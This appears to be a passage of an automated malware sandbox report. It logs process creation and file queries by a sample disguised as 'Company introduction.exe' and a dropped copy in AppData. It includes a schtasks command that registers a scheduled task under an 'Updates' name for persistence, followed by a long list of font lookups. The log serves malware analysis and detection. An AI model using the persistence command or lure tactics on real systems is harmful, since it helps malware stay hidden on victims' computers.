                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Users\user\Desktop\Company introduction.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
